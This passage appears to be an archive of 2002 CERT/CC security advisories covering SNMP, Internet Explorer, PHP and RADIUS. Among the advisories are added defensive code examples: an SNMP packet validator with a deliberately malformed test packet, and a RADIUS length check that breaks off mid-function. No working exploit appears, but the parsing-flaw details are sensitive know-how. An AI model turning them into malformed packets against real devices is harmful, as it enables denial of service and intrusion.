In 2001, the OUSPG produced a comprehensive test suite for evaluating implementations of the Lightweight Directory Access Protocol (LDAP). This test suite was developed with the strategy of abusing the protocol in unsupported and unexpected ways, and it was very effective in uncovering a wide variety of vulnerabilities across several products. This approach can reveal vulnerabilities that would not manifest themselves under normal conditions.

After completing its work on LDAP, OUSPG moved its focus to SNMPv1. As with LDAP, they designed a custom test suite, began testing a selection of products, and found a number of vulnerabilities. Because OUSPG's work on LDAP was similar in procedure to its current work on SNMP, you may wish to review the LDAP Test Suite and CERT Advisory CA-2001-18, which outlined the results of applying that test suite.

In order to test the security of protocols like SNMPv1, the PROTOS project presents a server with a wide variety of sample packets containing unexpected values or illegally formatted data. As a member of the PROTOS project consortium, the OUSPG used the PROTOS c06-snmpv1 test suite to study several implementations of the SNMPv1 protocol. Results of the test suites run against SNMP indicate that there are many different vulnerabilities in many different implementations of SNMP.

Background Information on the Simple Network Management Protocol

The Simple Network Management Protocol (SNMP) is the most popular protocol in use to manage networked devices.
SNMP was designed in the late 1980s to facilitate the exchange of management information between networked devices, operating at the application layer of the ISO/OSI model. The SNMP protocol enables network and system administrators to remotely monitor and configure devices on the network (devices such as switches and routers). Software and firmware products designed for networks often make use of the SNMP protocol.

SNMP runs on a multitude of devices and operating systems, including, but not limited to,

+ Core Network Devices (Routers, Switches, Hubs, Bridges, and Wireless Network Access Points)
+ Operating Systems
+ Consumer Broadband Network Devices (Cable Modems and DSL Modems)
+ Consumer Electronic Devices (Cameras and Image Scanners)
+ Networked Office Equipment (Printers, Copiers, and FAX Machines)
+ Network and Systems Management/Diagnostic Frameworks (Network Sniffers and Network Analyzers)
+ Uninterruptible Power Supplies (UPS)
+ Networked Medical Equipment (Imaging Units and Oscilloscopes)
+ Manufacturing and Processing Equipment

The SNMP protocol is formally defined in RFC 1157. Quoting from that RFC:

    Implicit in the SNMP architectural model is a collection of network management stations and network elements. Network management stations execute management applications which monitor and control network elements. Network elements are devices such as hosts, gateways, terminal servers, and the like, which have management agents responsible for performing the network management functions requested by the network management stations. The Simple Network Management Protocol (SNMP) is used to communicate management information between the network management stations and the agents in the network elements.
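The PROTOS findings described above come down to agents trusting the BER tag and length fields of an SNMPv1 message as they arrive off the wire. The decoder below is an added example, not code from the advisory or from any vendor: it parses an SNMPv1 request (RFC 1157 Message, PDU and VarBindList) while checking every length against the bytes actually present, and rejects malformed encodings with a ValueError. The sample GetRequest, its malformed variant and the MAX_LEN / MAX_VARBINDS policy limits are constructed for illustration.

```python
"""Strict SNMPv1 (RFC 1157) message decoder, an added example (not code from
the advisory or any vendor).  Every BER tag and length is validated against the
bytes actually present before use, so malformed packets of the kind the PROTOS
c06-snmpv1 suite produces raise ValueError instead of being trusted."""
INTEGER, OCTET_STRING, OBJECT_ID, SEQUENCE = 0x02, 0x04, 0x06, 0x30   # BER tags
PDU_TAGS = {0xA0: "GetRequest", 0xA1: "GetNextRequest",
            0xA2: "GetResponse", 0xA3: "SetRequest"}     # context-specific tags
MAX_LEN, MAX_VARBINDS = 65535, 64   # constructed agent policy limits


def read_tlv(buf: bytes, pos: int) -> tuple:
    """Decode one TLV at buf[pos:] -> (tag, value, next_pos), rejecting the
    indefinite form (0x80), over-long length fields and lengths past the end."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first < 0x80:                       # short form
        length = first
    else:                                  # long form: 0x8N then N bytes
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if length > MAX_LEN or pos + length > len(buf):
        raise ValueError("length %d exceeds buffer" % length)
    return tag, buf[pos:pos + length], pos + length


def expect(buf: bytes, pos: int, want: int) -> tuple:
    tag, value, pos = read_tlv(buf, pos)   # like read_tlv, but the tag is fixed
    if tag != want:
        raise ValueError("expected tag 0x%02X, got 0x%02X" % (want, tag))
    return value, pos


def decode_int(value: bytes) -> int:
    if not 1 <= len(value) <= 4:           # SNMPv1 INTEGER is 32-bit
        raise ValueError("bad INTEGER length")
    return int.from_bytes(value, "big", signed=True)


def decode_oid(value: bytes) -> str:
    """Decode a BER OBJECT IDENTIFIER into dotted form, e.g. '1.3.6.1'."""
    if not value or value[0] & 0x80 or value[-1] & 0x80:
        raise ValueError("malformed OBJECT IDENTIFIER")
    first = value[0]
    arcs = [2, first - 80] if first >= 80 else [first // 40, first % 40]
    acc = 0
    for b in value[1:]:                    # base-128, high bit = continue
        acc = (acc << 7) | (b & 0x7F)
        if acc > 0xFFFFFFFF:
            raise ValueError("OID sub-identifier too large")
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def parse_snmpv1(datagram: bytes) -> dict:
    """Parse a complete SNMPv1 Message; raise ValueError on anything malformed."""
    msg, end = expect(datagram, 0, SEQUENCE)
    if end != len(datagram):
        raise ValueError("trailing bytes after Message")
    version, pos = expect(msg, 0, INTEGER)
    if decode_int(version) != 0:           # version-1(0)
        raise ValueError("not an SNMPv1 message")
    community, pos = expect(msg, pos, OCTET_STRING)
    pdu_tag, pdu, pos = read_tlv(msg, pos)
    if pdu_tag not in PDU_TAGS or pos != len(msg):
        raise ValueError("unsupported PDU or trailing bytes after PDU")
    request_id, pos = expect(pdu, 0, INTEGER)
    error_status, pos = expect(pdu, pos, INTEGER)
    error_index, pos = expect(pdu, pos, INTEGER)
    vbl, pos = expect(pdu, pos, SEQUENCE)
    if pos != len(pdu):
        raise ValueError("trailing bytes after VarBindList")
    varbinds, vpos = [], 0
    while vpos < len(vbl):
        if len(varbinds) >= MAX_VARBINDS:  # bound the work one request can cause
            raise ValueError("too many VarBinds")
        vb, vpos = expect(vbl, vpos, SEQUENCE)
        oid, p = expect(vb, 0, OBJECT_ID)
        vtag, vval, p = read_tlv(vb, p)
        if p != len(vb):
            raise ValueError("trailing bytes in VarBind")
        varbinds.append((decode_oid(oid), vtag, vval))
    return {"pdu": PDU_TAGS[pdu_tag], "community": community.decode("latin-1"),
            "request_id": decode_int(request_id), "varbinds": varbinds,
            "error_status": decode_int(error_status), "error_index": decode_int(error_index)}


def is_well_formed(datagram: bytes) -> bool:
    try:
        return bool(parse_snmpv1(datagram))
    except ValueError:
        return False


# Constructed sample: GetRequest, community "public", for sysDescr.0 (40 bytes).
SAMPLE_GETREQUEST = bytes.fromhex(
    "3026" "020100" "04067075626c6963"     # Message, version 0, "public"
    "a019" "020101" "020100" "020100"      # GetRequest; req-id 1, status 0, index 0
    "300e" "300c" "06082b06010201010100"   # VarBindList, VarBind, OID 1.3.6.1.2.1.1.1.0
    "0500")                                # NULL value
# Constructed malformed variant: the OID length byte at offset 29 claims 127
# bytes although only 10 remain in the enclosing VarBind; read_tlv rejects it.
MALFORMED_LENGTH = SAMPLE_GETREQUEST[:29] + b"\x7f" + SAMPLE_GETREQUEST[30:]
```

The same length-before-use discipline applies to Trap-PDU decoding (VU#107186), which has a different field layout and is left out here.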
Additionally, SNMP is discussed in a number of other RFC documents:

+ RFC 3000 Internet Official Protocol Standards
+ RFC 1212 Concise MIB Definitions
+ RFC 1213 Management Information Base for Network Management of TCP/IP-based Internets: MIB-II
+ RFC 1215 A Convention for Defining Traps for use with the SNMP
+ RFC 1270 SNMP Communications Services
+ RFC 2570 Introduction to Version 3 of the Internet-standard Network Management Framework
+ RFC 2571 An Architecture for Describing SNMP Management Frameworks
+ RFC 2572 Message Processing and Dispatching for the Simple Network Management Protocol (SNMP)
+ RFC 2573 SNMP Applications
+ RFC 2574 User-based Security Model (USM) for version 3 of the Simple Network Management Protocol (SNMPv3)
+ RFC 2575 View-based Access Control Model (VACM) for the Simple Network Management Protocol (SNMP)
+ RFC 2576 Coexistence between Version 1, Version 2, and Version 3 of the Internet-standard Network Management Framework

_____________________________________________________________

The CERT Coordination Center thanks the Oulu University Secure Programming Group for reporting these vulnerabilities to us, for providing detailed technical analyses, and for assisting us in preparing this advisory. We also thank Steven M. Bellovin (AT&T Labs -- Research), Wes Hardaker (Net-SNMP), Steve Moulton (SNMP Research), Tom Reddington (Bell Labs), Mike Duckett (Bell South), Rob Thomas, Blue Boar (Thievco), and the many others who contributed to this document.

_____________________________________________________________

Feedback on this document can be directed to the authors, Ian A. Finlay, Shawn V. Hernan, Jason A. Rafail, Chad Dougherty, Allen D. Householder, Marty Lindner, and Art Manion.
__________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-03.html

__________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
    CERT Coordination Center
    Software Engineering Institute
    Carnegie Mellon University
    Pittsburgh PA 15213-3890
    U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

    subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

__________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_____________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

February 12, 2002: Initial release

From - Mon Feb 25 10:05:57 2002
Date: Mon, 25 Feb 2002 12:03:00 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer

CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer

Original release date: February 25, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft Internet Explorer
* Microsoft Outlook and Outlook Express
* Other applications that use the Internet Explorer HTML rendering engine

Overview

Microsoft Internet Explorer contains a buffer overflow vulnerability in its handling of embedded objects in HTML documents. This vulnerability could allow an attacker to execute arbitrary code on the victim's system when the victim visits a web page or views an HTML email message.

I. Description

Internet Explorer supports the <EMBED> directive, which can be used to include arbitrary objects in HTML documents. Common types of embedded objects include multimedia files, Java applets, and ActiveX controls. The SRC attribute specifies the source path and filename of an object. For example, a MIDI sound might be embedded in a web page with an <EMBED> element whose SRC attribute names the MIDI file.

Internet Explorer uses attributes of the <EMBED> directive and MIME information from the web server to determine how to handle an embedded object. In most cases, a separate application or plugin is used.

A group of Russian researchers, SECURITY.NNOV, has reported that Internet Explorer does not properly handle the SRC attribute of the <EMBED> directive.
An HTML document, such as a web page or HTML email message, that contains a crafted SRC attribute can trigger a buffer overflow, executing code with the privileges of the user viewing the document. Microsoft Internet Explorer, Outlook, and Outlook Express are vulnerable. Other applications that use the Internet Explorer HTML rendering engine, such as Windows compiled HTML help (.chm) files and third-party email clients, may also be vulnerable.

The CERT/CC is tracking this vulnerability as VU#932283, which corresponds directly to the "buffer overrun" vulnerability described in Microsoft Security Bulletin MS02-005. This vulnerability has been assigned the CVE identifier CAN-2002-0022.

II. Impact

By convincing a user to view a malicious HTML document, an attacker can cause the Internet Explorer HTML rendering engine to execute arbitrary code with the privileges of the user who viewed the HTML document. This vulnerability could be exploited to distribute viruses, worms, or other malicious code.

III. Solution

Apply a patch

Microsoft has released a cumulative patch for Internet Explorer that corrects this vulnerability and several others. For more information about the patch and the vulnerabilities, please see Microsoft Security Bulletin MS02-005:

http://www.microsoft.com/technet/security/bulletin/MS02-005.asp

Disable ActiveX Controls and Plugins

In Internet Explorer, plugins may be used to view, play, or otherwise process embedded objects. The execution of embedded objects is controlled by the "Run ActiveX Controls and Plugins" security option. Disabling this option will prevent embedded objects from being processed, and will therefore prevent exploitation of this vulnerability. According to MS02-005:

    The vulnerability could not be exploited if the "Run ActiveX Controls and Plugins" security option were disabled in the Security Zone in which the page was rendered. This is the default condition in the Restricted Sites Zone, and can be disabled manually in any other Zone.
At a minimum, disable the "Run ActiveX Controls and Plugins" security option in the Internet Zone and the zone used by Outlook or Outlook Express. The "Run ActiveX Controls and Plugins" security option is disabled in the "High" zone security setting. Instructions for configuring the Internet Zone to use the "High" zone security setting can be found in the CERT/CC Malicious Web Scripts FAQ:

http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps

Apply the Outlook Email Security Update

Another way to effectively disable the processing of ActiveX controls and plugins in Outlook is to install the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where the "Run ActiveX Controls and Plugins" security option is disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook.

* Outlook 2002 and Outlook Express 6
  The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6.
* Outlook 2000
  http://office.microsoft.com/downloads/2000/Out2ksec.aspx
* Outlook 98
  http://office.microsoft.com/downloads/9798/Out98sec.aspx

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Microsoft

Microsoft has released a Security Bulletin and a Knowledge Base Article addressing this vulnerability:

* Security Bulletin MS02-005
  http://www.microsoft.com/technet/security/bulletin/MS02-005.asp
* Knowledge Base Article Q317731
  http://support.microsoft.com/default.aspx?scid=kb;en-us;Q317731

Cyrusoft

Our email client Mulberry does not use the core HTML rendering engine library for its HTML display, and so is not affected by the bug in that library.
Having looked at the details of this alert, I can also confirm that our own HTML rendering engine is not affected by this, as it ignores the relevant tags.

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/932283
2. http://www.security.nnov.ru/advisories/mshtml.asp
3. http://www.microsoft.com/technet/security/bulletin/MS02-005.asp
4. http://support.microsoft.com/default.aspx?scid=kb;en-us;Q317731
5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0022
6. http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/embed.asp
7. http://developer.netscape.com/docs/manuals/htmlguid/tags14.htm#1286379

_________________________________________________________________

The CERT/CC thanks ERRor and DarkZorro of domain Hell and 3APA3A of SECURITY.NNOV for reporting this issue to us.

_________________________________________________________________

Author: Art Manion

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-04.html
Getting security information

CERT publications and other security information are available from our web site

   http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

   subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.
Revision History

   February 25, 2002: Initial release

From - Wed Feb 27 16:05:59 2002
Date: Wed, 27 Feb 2002 16:54:43 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-05 Multiple Vulnerabilities in PHP fileupload

CERT Advisory CA-2002-05 Multiple Vulnerabilities in PHP fileupload

   Original release date: February 27, 2002
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   * Web servers running PHP

Overview

Multiple vulnerabilities exist in the PHP scripting language. These vulnerabilities could allow a remote attacker to execute arbitrary code with the privileges of the PHP process.

I. Description

PHP is a scripting language widely used in web development. PHP can be installed on a variety of web servers, including Apache, IIS, Caudium, Netscape and iPlanet, OmniHTTPd and others.

Vulnerabilities in the php_mime_split function may allow an intruder to execute arbitrary code with the privileges of the web server. For additional details, see

   http://security.e-matters.de/advisories/012002.html

Web servers that do not have PHP installed are not affected by this vulnerability.

The CERT/CC is tracking this set of vulnerabilities as VU#297363. At this time, these vulnerabilities have not been assigned a CVE identifier.

II. Impact

Intruders can execute arbitrary code with the privileges of the web server, or interrupt normal operations of the web server.

III. Solution

Apply a Patch

Upgrade to PHP version 4.1.2, available from

   http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz

If upgrading is not possible, apply patches as described at http://www.php.net/downloads.php:

   * For PHP 4.10/4.11
     http://www.php.net/do_download.php?download_file=rfc1867.c.diff-4.1.x.gz
   * For PHP 4.06
     http://www.php.net/do_download.php?download_file=rfc1867.c.diff-4.0.6.gz
   * For PHP 3.0
     http://www.php.net/do_download.php?download_file=mime.c.diff-3.0.gz

If you are using version 4.20-dev, you are not affected by this vulnerability. Quoting from http://security.e-matters.de/advisories/012002.html:

   "[U]sers running PHP 4.2.0-dev from cvs are not vulnerable to any of the described bugs because the fileupload code was completely rewritten for the 4.2.0 branch."

Disable fileuploads

If upgrading is not possible or a patch cannot be applied, you can avoid these vulnerabilities by disabling fileupload support. Edit the PHP configuration file php.ini as follows:

   file_uploads = off

Note that this setting only applies to version 4.0.3 and above. However, this will prevent you from using fileuploads, which may not be acceptable in your environment.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apache Software Foundation

Information about this vulnerability is available from http://www.php.net

FreeBSD

FreeBSD does not include any version of PHP by default, and so is not vulnerable. However, the FreeBSD Ports Collection does contain both PHP3 and PHP4 packages. Updates to the PHP packages are in progress and corrected packages will be available in the near future.
MandrakeSoft

MandrakeSoft distributes PHP in all distributions and we are currently working on patching our versions of PHP for Linux-Mandrake 7.1 and 7.2; Mandrake Linux 8.0, 8.0/ppc, 8.1, and 8.1/ia64; Single Network Firewall 7.2; Corporate Server 1.0.1. We anticipate having the updates out by the end of the week.

Microsoft

We do not use PHP in any products.

NCSA

NCSA does not include PHP as an add-in or bundled component in any products distributed.

Red Hat

Red Hat was notified of this issue on 27th February 2002. All supported versions of Red Hat Linux ship with PHP packages that are affected by these vulnerabilities. We will shortly be releasing errata packages which contain patched versions that are not vulnerable. The errata packages and our advisory will be available on our web site at the URL below. At the same time users of the Red Hat Network will be able to update their systems to patched versions using the up2date tool.

   http://www.redhat.com/support/errata/RHSA-2002-035.html
_________________________________________________________________

The CERT Coordination Center thanks Stefan Esser, upon whose advisory this document is largely based.
_________________________________________________________________

Author: Shawn V. Hernan
_________________________________________________________________

Appendix B. - References

   1. http://www.kb.cert.org/vuls/id/297363
   2. http://security.e-matters.de/advisories/012002.html
   3. http://www.iss.net/security_center/static/8281.php
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-05.html
______________________________________________________________________

Copyright 2002 Carnegie Mellon University.
Revision History

   February 27, 2002: Initial release

From - Thu Feb 28 14:56:02 2002
Date: Thu, 28 Feb 2002 15:11:46 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Summary CS-2002-01

CERT Summary CS-2002-01

February 28, 2002

Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.

Past CERT summaries are available from:

   CERT Summaries
   http://www.cert.org/summaries/
______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in November 2001 (CS-2001-04), we have released several advisories, notably CA-2002-03, describing multiple vulnerabilities in SNMP. In addition, we have published 2001 statistics, our annual report, and a white paper on external computer security incidents.

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.

   CERT/CC Current Activity
   http://www.cert.org/current/current_activity.html

1. Multiple Vulnerabilities in SNMP

Numerous vulnerabilities have been reported in multiple vendors' SNMP implementations. These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or cause unstable behavior.
If your site uses SNMP in any capacity, the CERT/CC encourages you to read this advisory and follow the advice provided in the Solution section. In addition to this advisory, we also have an FAQ on SNMP vulnerabilities.

   CERT Advisory CA-2002-03: Multiple Vulnerabilities In Many Implementations of the Simple Network Management Protocol (SNMP)
   http://www.cert.org/advisories/CA-2002-03.html

   Simple Network Management Protocol (SNMP) Vulnerabilities Frequently Asked Questions (FAQ)
   http://www.cert.org/tech_tips/snmp_faq.html

2. Exploitation of Vulnerability in Solaris CDE Subprocess Control Service

Since CA-2001-31 was originally released last November, the CERT/CC has received reports of scanning for dtspcd (6112/tcp). Just recently, however, we have received credible reports of an exploit for Solaris systems. Using network traces provided by The Honeynet Project, we have confirmed that the dtspcd vulnerability identified in CA-2001-31 and discussed in VU#172583 is actively being exploited.

   CERT Advisory CA-2002-01: Exploitation of Vulnerability in CDE Subprocess Control Service
   http://www.cert.org/advisories/CA-2002-01.html

   CERT Advisory CA-2001-31: Buffer Overflow in CDE Subprocess Control Service
   http://www.cert.org/advisories/CA-2001-31.html

   Vulnerability Note #172583: Common Desktop Environment (CDE) Subprocess Control Service dtspcd contains buffer overflow
   http://www.kb.cert.org/vuls/id/172583

3. Buffer Overflow Vulnerability in Microsoft Windows UPnP Service

Vulnerabilities in software included by default on Microsoft Windows XP, and optionally on Windows ME and Windows 98, may allow an intruder to execute arbitrary code on vulnerable systems, to launch denial-of-service attacks against vulnerable systems, or to use vulnerable systems to launch denial-of-service attacks against third-party systems.
To date we have not received any confirmed reports of UPnP exploitation; however, we urge Windows users to follow the advice provided in CA-2001-37 to protect their systems.

   CERT Advisory CA-2001-37: Buffer Overflow in UPnP Service On Microsoft Windows
   http://www.cert.org/advisories/CA-2001-37.html

   Vulnerability Note #951555: Microsoft Windows Universal Plug and Play (UPNP) vulnerable to buffer overflow via malformed advertisement packets
   http://www.kb.cert.org/vuls/id/951555

   Vulnerability Note #411059: Microsoft Windows Universal Plug and Play (UPNP) fails to limit the data returned in response to a NOTIFY message
   http://www.kb.cert.org/vuls/id/411059

4. Recent Activity Against Secure Shell Daemons

There are multiple vulnerabilities in several implementations of the Secure Shell (SSH) protocol. The SSH protocol enables a secure communications channel from a client to a server. We are still seeing a high amount of scanning for SSH daemons, and we are receiving reports of exploitation. System administrators should review their configurations to ensure that they have applied all relevant patches.

   CERT Advisory CA-2001-35: Recent Activity Against Secure Shell Daemons
   http://www.cert.org/advisories/CA-2001-35.html

   Vulnerability Note #945216: SSH CRC32 attack detection code contains remote integer overflow
   http://www.kb.cert.org/vuls/id/945216

   CERT Incident Note IN-2001-12: Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector
   http://www.cert.org/incident_notes/IN-2001-12.html

5. Multiple Vulnerabilities in WU-FTPD

WU-FTPD is a widely deployed software package used to provide File Transfer Protocol (FTP) services on UNIX and Linux systems. There are two vulnerabilities in WU-FTPD that expose a system to potential remote root compromise by anyone with access to the FTP service. These vulnerabilities have recently received increased scrutiny.

   CERT Advisory CA-2001-33: Multiple Vulnerabilities in WU-FTPD
   http://www.cert.org/advisories/CA-2001-33.html

6. W32/BadTrans Worm

We have seen a steady stream of reports related to W32/Badtrans since November 2001. W32/BadTrans is a malicious Windows program distributed as an email file attachment. Because of a known vulnerability in Internet Explorer, some email programs, such as Outlook Express and Outlook, may execute the malicious program as soon as the email message is viewed. Windows users should apply appropriate patches and update their antivirus programs as described in IN-2001-14.

   CERT Incident Note IN-2001-14: W32/BadTrans Worm
   http://www.cert.org/incident_notes/IN-2001-14.html

7. "Kaiten" Malicious Code

The CERT/CC has received reports of a new variant of the "Kaiten" malicious code being installed through exploitation of null default sa passwords in Microsoft SQL Server and Microsoft Data Engine. (Microsoft SQL 2000 Server will allow a null sa password to be used, but this is not default behavior.) Various sources have referred to this malicious code as "W32/Voyager," "Voyager Alpha Force," and "W32/CBlade.worm."
   CERT Incident Note IN-2001-13: "Kaiten" Malicious Code Installed by Exploiting Null Default Passwords in MS-SQL
   http://www.cert.org/incident_notes/IN-2001-13.html
______________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new and updated

   * CERT/CC 2001 Annual Report
     http://www.cert.org/annual_rpts/cert_rpt_01.html
   * Advisories
     http://www.cert.org/advisories/
   * Computer Security Incident Response Team (CSIRT) Frequently Asked Questions
     http://www.cert.org/csirts/csirt_faq.html
   * External Security Incidents White Paper
     http://www.cert.org/archive/pdf/external-incidents.pdf
   * Incident Notes
     http://www.cert.org/incident_notes/
   * CERT/CC Statistics
     http://www.cert.org/stats/cert_stats.html
   * Training Schedule
     http://www.cert.org/training/
______________________________________________________________________

This document is available from:
http://www.cert.org/summaries/CS-2002-01.html
______________________________________________________________________

Copyright 2002 Carnegie Mellon University.

From - Mon Mar 4 14:26:14 2002
Date: Mon, 4 Mar 2002 14:44:18 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-06 Vulnerabilities in Various Implementations of the RADIUS Protocol

CERT Advisory CA-2002-06 Vulnerabilities in Various Implementations of the RADIUS Protocol

   Original release date: March 4, 2002
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

Systems running any of the following RADIUS implementations:

   * Ascend RADIUS versions 1.16 and prior
   * Cistron RADIUS versions 1.6.5 and prior
   * FreeRADIUS versions 0.3 and prior
   * GnuRADIUS versions 0.95 and prior
   * ICRADIUS versions 0.18.1 and prior
   * Livingston RADIUS versions 2.1 and earlier
   * RADIUS (previously known as Lucent RADIUS) versions 2.1 and prior
   * RADIUSClient versions 0.3.1 and prior
   * XTRADIUS 1.1-pre1 and prior
   * YARD RADIUS 1.0.19 and prior

Overview

Remote Authentication Dial In User Service (RADIUS) servers are used for authentication, authorization and accounting for terminals that speak the RADIUS protocol. Multiple vulnerabilities have been discovered in several implementations of the RADIUS protocol.

I. Description

Two vulnerabilities in various implementations of RADIUS clients and servers have been reported to several vendors and the CERT/CC. They are remotely exploitable, and on most systems result in a denial of service. VU#589523 may allow the execution of code if the attacker has knowledge of the shared secret.

VU#589523 - Multiple implementations of the RADIUS protocol contain a digest calculation buffer overflow

Multiple implementations of the RADIUS protocol contain a buffer overflow in the function that calculates message digests.
During the message digest calculation, a string containing the shared secret is concatenated with a packet received without checking the size of the target buffer. This makes it possible to overflow the buffer with shared secret data. This can lead to a denial of service against the server. If the shared secret is known by the attacker, then it may be possible to use this information to execute arbitrary code with the privileges of the victim RADIUS server or client, usually root. It should be noted that gaining knowledge of the shared secret is not a trivial task.

Systems Affected by VU#589523

   * Ascend RADIUS versions 1.16 and prior
   * Cistron RADIUS versions 1.6.4 and prior
   * FreeRADIUS versions 0.3 and prior
   * GnuRADIUS versions 0.95 and prior
   * ICRADIUS versions 0.18.1 and prior
   * Livingston RADIUS versions 2.1 and earlier
   * RADIUS (commonly known as Lucent RADIUS) versions 2.1 and prior
   * RADIUSClient versions 0.3.1 and prior
   * YARD RADIUS 1.0.19 and prior
   * XTRADIUS 1.1-pre1 and prior

VU#936683 - Multiple implementations of the RADIUS protocol do not adequately validate the vendor-length of vendor-specific attributes.

Various RADIUS servers and clients permit the passing of vendor-specific and user-specific attributes. Several implementations of RADIUS fail to check the vendor-length of vendor-specific attributes. It is possible to cause a denial of service against RADIUS servers with a malformed vendor-specific attribute.

RADIUS servers and clients fail to validate the vendor-length inside vendor-specific attributes. The vendor-length shouldn't be less than 2. If vendor-length is less than 2, the RADIUS server (or client) calculates the attribute length as a negative number. The attribute length is then used in various functions. In most RADIUS servers the function that performs this calculation is rad_recv() or radrecv(). Some applications may use the same logic to validate user-specific attributes and be vulnerable via the same method.
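As an added illustration, not code from the advisory or from any of the RADIUS implementations it lists, the following C walks a RADIUS attribute list and applies the vendor-length check that VU#936683 describes as missing, and bounds the packet-plus-secret concatenation that VU#589523 describes. The attribute bytes, the Vendor-Id 1234, the shared secret and all function names are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define RADIUS_ATTR_VENDOR_SPECIFIC 26   /* RFC 2865 attribute type */

/* Result codes for the attribute walk. */
enum {
    ATTRS_OK = 0,
    ATTRS_BAD_ATTR_LEN = -1,     /* attribute length < 2 or past end of packet */
    ATTRS_BAD_VENDOR_LEN = -2,   /* vendor-length < 2 or past end of the VSA */
    ATTRS_TRUNCATED = -3         /* fewer than 2 bytes left where a header is due */
};

/* The unchecked arithmetic the advisory describes: a data length derived
 * from an untrusted vendor-length goes negative when vendor-length is 0 or 1. */
int naive_vendor_data_len(uint8_t vendor_length)
{
    return (int)vendor_length - 2;
}

/* Walk the attribute list attrs[0..len) of a RADIUS packet and validate
 * every Vendor-Specific attribute (type 26). Layout of a VSA value:
 *   Vendor-Id (4 bytes), then one or more { vendor-type, vendor-length, data }.
 * Returns ATTRS_OK and stores the number of vendor sub-attributes in *nvsa,
 * or a negative code at the first defect, before any length is used. */
int validate_radius_attrs(const uint8_t *attrs, size_t len, int *nvsa)
{
    size_t off = 0;
    *nvsa = 0;
    while (off < len) {
        if (len - off < 2)
            return ATTRS_TRUNCATED;
        uint8_t type = attrs[off];
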